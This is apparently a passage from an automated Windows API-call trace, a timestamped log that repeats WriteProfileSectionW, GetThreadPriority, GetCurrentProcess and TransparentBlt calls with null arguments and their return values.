[0036.489] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.490] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.490] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.491] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.491] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.492] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.492] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.493] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.493] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.494] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.494] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.495] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.495] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.495] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.495] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.495] GetThreadPriority (hThread=0x0) returned 2147483647 [0036.495] WriteProfileSectionW (lpAppName=0x0, lpString=0x0) returned 1 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.498] TransparentBlt () returned 0x0 [0036.498] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.499] TransparentBlt () returned 0x0 [0036.499] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.500] TransparentBlt () returned 0x0 [0036.500] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.501] TransparentBlt () returned 0x0 [0036.501] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.502] TransparentBlt () returned 0x0 [0036.502] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.503] TransparentBlt () returned 0x0 [0036.503] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.504] TransparentBlt () returned 0x0 [0036.504] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.505] TransparentBlt () returned 0x0 [0036.505] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.506] GetCurrentProcess () returned 0xffffffff [0036.506] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff [0036.507] TransparentBlt () returned 0x0 [0036.507] GetCurrentProcess () returned 0xffffffff 